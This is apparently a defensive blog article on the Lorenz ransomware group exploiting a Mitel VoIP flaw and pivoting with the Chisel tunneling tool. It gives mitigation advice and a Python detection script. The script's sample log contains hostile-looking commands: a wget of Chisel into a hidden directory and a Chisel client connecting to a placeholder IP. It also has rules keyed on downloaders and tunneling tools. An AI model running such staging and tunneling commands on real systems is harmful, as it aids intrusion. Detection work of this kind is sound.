Where data is home

Lorenz Ransomware Group Exploits Phone Systems To Breach Enterprise Networks


The Lorenz Ransomware Group has been actively targeting enterprise organizations worldwide since December 2020, using various methods to breach corporate networks and extort hefty ransoms. Their latest approach exploits a vulnerability in Mitel VoIP appliances, CVE-2022-29499. After gaining unauthorized access through such an appliance, the group establishes a reverse shell and deploys the TCP tunneling tool Chisel to pivot further into the network. These actions put over 19,000 devices at risk and compromise the security of critical sectors that rely on Mitel VoIP products. The Lorenz gang has been identified with a high level of confidence as the perpetrator of these incidents. To mitigate the risk, recommended measures include upgrading to MiVoice Connect Version R19.3, regularly scanning external appliances and web applications, avoiding direct exposure of critical assets to the internet, configuring PowerShell logging, and implementing off-site logging. Regular backups, secure web filtering solutions, and measures that limit the impact of a successful attack are also essential.

Key Takeaways

  • The Lorenz Ransomware Group has been targeting enterprise organizations worldwide since December 2020 and demands ransoms of hundreds of thousands of dollars from its victims.
  • The group uses Mitel VoIP appliances to reach corporate networks, exploiting the CVE-2022-29499 vulnerability to gain initial access.
  • The gang downloads the TCP tunneling tool Chisel from Github via wget and uses it to tunnel traffic and pivot within the compromised networks of critical sectors.
  • Enterprises using Mitel VoIP products are at risk, and it is recommended to upgrade to MiVoice Connect Version R19.3, perform regular scanning of external appliances and web applications, and implement measures like network segmentation and secure web filtering to limit the impact of potential attacks.

Lorenz Ransomware Group

The Lorenz Ransomware Group has been targeting enterprise organizations worldwide since December 2020. It demands large ransom payments, sells stolen data to other threat actors, uses the same encryptor as ThunderCrypt, and exploits Mitel VoIP appliances to gain access to corporate networks. The group poses a significant threat to enterprise networks globally: ransom demands can cause substantial financial losses, and the sale of stolen data exposes affected organizations to further exploitation. Protecting phone systems from ransomware therefore requires effective measures: regularly scanning external appliances and web applications, upgrading to the latest MiVoice Connect version, and avoiding direct exposure of critical assets to the internet. Configuring PowerShell logging, implementing off-site logging, and storing backups securely and offline further strengthen data protection, while network segmentation, access control, and secure web filtering solutions limit the impact of an attack.

Mitel VOIP Appliances

Mitel VoIP appliances have been used by threat actors as an entry point for unauthorized access to corporate networks, which poses a significant risk to enterprises worldwide. The impact that vulnerabilities in Mitel appliances can have on enterprise networks should not be underestimated, so it is crucial for organizations to apply Mitel VoIP security best practices to protect their networks from exploitation.

To address this issue, here are three important considerations:

  1. Regular Updates and Patches: Organizations should ensure that their Mitel appliances are running the latest firmware and security patches. This helps to mitigate the risk of known vulnerabilities being exploited.

  2. Network Segmentation: Implementing network segmentation can help limit the blast radius of an attack. By separating critical systems from less sensitive ones, organizations can minimize the potential impact of a breach.

  3. Access Control: Applying the principle of least privilege is essential. Restricting user access to Mitel appliances and regularly reviewing and updating access controls can help prevent unauthorized access.

By following these Mitel VoIP security best practices, enterprises can enhance their network security and protect against potential breaches.

Vulnerability Exploitation

Vulnerability exploitation was the initial method used to gain unauthorized access to the corporate networks. In the Lorenz Ransomware Group's breach of enterprise networks, the CVE-2022-29499 vulnerability in Mitel VoIP appliances was specifically targeted, and these appliances played a central role in the intrusion. By leveraging this vulnerability, the Lorenz gang established a reverse shell and pivoted into the environment using the TCP tunneling tool Chisel. The breach has had a significant impact on critical sectors worldwide, as Mitel VoIP products are widely used there. The compromised security of affected enterprises has led to potential financial losses from ransom demands, as well as the sale of stolen data, both to pressure victims and for profit.

Vulnerability exploitation at a glance:

  • Initial access method: CVE-2022-29499 vulnerability
  • Lorenz gang attributed with high confidence
  • Mitel appliance on the network perimeter
  • Reverse shell established for access
  • Impact on critical sectors
  • Role of Mitel appliances in the breach
  • Enterprises' security compromised
  • Potential financial losses

Mitel Device Command Line Interface

Using the command line interface of the targeted Mitel devices, the threat actors behind the recent breach created a hidden directory and downloaded a compiled binary of the Chisel tool from Github, extending their reach into the networks of critical sectors. This highlights weaknesses in Mitel device management and the risk that an exposed command line interface represents. By exploiting these weaknesses, the Lorenz ransomware group gained unauthorized access to enterprise networks and carried out its malicious activities: the command line interface let the attackers execute commands and fetch Chisel, which in turn provided TCP tunneling and further exploitation of the compromised networks. The incident underscores the importance of regularly assessing and addressing vulnerabilities in device management interfaces to reduce the risk of similar breaches in the future.
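As an added illustration (not code from the article, from Mitel, or from the Chisel project), the Python script below runs a small set of detection rules over a constructed command-audit log from a Linux-based appliance, looking for the chain described above: a tunneling tool fetched via wget into a hidden directory and then executed. The log format, the usernames, the repository owner and the version string are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log in a hypothetical appliance command-audit format,
# "<ISO timestamp> <user> CMD: <command line>"; repo owner and version are placeholders.
SAMPLE_LOG = """\
2022-06-01T10:02:11Z admin CMD: ls -la /var/log
2022-06-01T10:03:45Z www-data CMD: mkdir /tmp/.cache_x
2022-06-01T10:03:52Z www-data CMD: wget https://github.com/EXAMPLE_OWNER/chisel/releases/download/vX.Y.Z/chisel_linux_amd64.gz -O /tmp/.cache_x/c.gz
2022-06-01T10:04:10Z www-data CMD: /tmp/.cache_x/chisel client 203.0.113.5:8080
2022-06-01T11:15:00Z admin CMD: wget https://updates.example.com/firmware/update.tar -O /opt/update.tar
"""

LINE_RE = re.compile(r"^(\S+) (\S+) CMD: (.*)$")
DOWNLOADERS = {"wget", "curl"}
TUNNEL_TOOLS = {"chisel"}
HIDDEN_PATH = re.compile(r"(?:^|/)\.(?![./])")  # '/tmp/.x' or '.x', but not './' or '../'


def analyze_command(cmd: str) -> list:
    """Return the names of the detection rules a single command line trips."""
    tokens = cmd.split()
    prog = tokens[0].rsplit("/", 1)[-1] if tokens else ""  # basename of the program run
    hits = []
    if prog in DOWNLOADERS and any(t in cmd.lower() for t in TUNNEL_TOOLS):
        hits.append("tunnel_tool_download")  # wget/curl fetching a known tunneling tool
    if prog in TUNNEL_TOOLS:
        hits.append("tunnel_tool_executed")  # the tunneling tool itself is launched
    # Only absolute or dot-relative tokens are treated as paths; URLs and flags are skipped.
    if any(HIDDEN_PATH.search(t) for t in tokens if t.startswith(("/", "."))):
        hits.append("hidden_path")  # staging files in a hidden directory
    return hits


def triage(log_text: str) -> dict:
    """Apply the rules per line, then correlate per user: download plus execution is high confidence."""
    findings, by_user = [], defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, user, cmd = m.groups()
        hits = analyze_command(cmd)
        if hits:
            findings.append((ts, user, hits))
            by_user[user].update(hits)
    chain = {"tunnel_tool_download", "tunnel_tool_executed"}
    high = sorted(u for u, h in by_user.items() if chain <= h)
    return {"findings": findings, "high_confidence_users": high}
```

On the sample log, the legitimate firmware download by admin produces no finding, while the three www-data lines are flagged and that user is escalated because it both fetched and ran the tool.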

Risk and Impact

The recent breach of enterprise networks highlights the significant risk and potential impact associated with a compromised command line interface on targeted devices. Enterprises face potential financial losses from the ransom demands of the Lorenz ransomware group, and the stolen data, which includes sensitive information, is sold to pressure victims and for profit. To mitigate these risks, organizations should prioritize protecting sensitive data from theft. Secure web filtering solutions can help block malicious websites and downloads, while regular scanning of external appliances and web applications can identify vulnerabilities. Enterprises should also emphasize regular backups and implement backup solutions for critical data; testing backup and recovery processes periodically and storing backups securely and offline are essential components of a comprehensive backup strategy.

Frequently Asked Questions

How does the Lorenz Ransomware Group gain initial access to enterprise networks?

The Lorenz ransomware group gains initial access to enterprise networks by exploiting the CVE-2022-29499 vulnerability in Mitel VOIP appliances. Steps to mitigate the risk of a Lorenz gang attack include upgrading to MiVoice Connect Version R19.3 and regularly scanning external appliances and web applications.

What specific vulnerability does the Lorenz gang exploit to access Mitel VOIP Appliances?

The Lorenz gang exploits CVE-2022-29499, a vulnerability in Mitel VoIP appliances, to gain access to enterprise networks. The gang uses this VoIP vulnerability as the initial access step in its ransomware operations.

How does the Mitel Device Command Line Interface play a role in the Lorenz gang’s attack strategy?

The Mitel device command line interface plays a crucial role in the Lorenz gang’s attack strategy. It enables them to create hidden directories, download the Chisel tool from Github, and use Mitel devices for TCP tunneling, enhancing their capabilities in attacking critical sectors.

What are the potential financial losses for enterprises affected by the Lorenz Ransomware Group?

The potential financial impact for enterprises affected by the Lorenz ransomware group includes the ransom demand itself and the cost of remediation, such as implementing security measures to prevent future attacks. These expenses can amount to significant financial losses for the affected organizations.

What are the recommended steps to mitigate the risk of a Lorenz gang attack on enterprise networks?

Mitigating Lorenz gang attacks on enterprise networks requires implementing best practices for network security. These include upgrading to the latest software version, regularly scanning external appliances and web applications, avoiding direct exposure of critical assets to the internet, configuring PowerShell logging, and implementing off-site logging for improved data protection. Additionally, organizations should emphasize the importance of regular backups, implement secure backup solutions for critical data, test backup and recovery processes periodically, store backups securely and offline, and develop a comprehensive backup strategy. Measures to limit the impact of potential attacks should also be implemented, such as segregating networks, restricting access privileges, implementing network segmentation and firewall rules, using least privilege principles for user access, and regularly reviewing and updating access controls. Secure web filtering solutions should be implemented to block malicious websites and downloads, monitor and filter internet traffic for threats, and enhance network security.
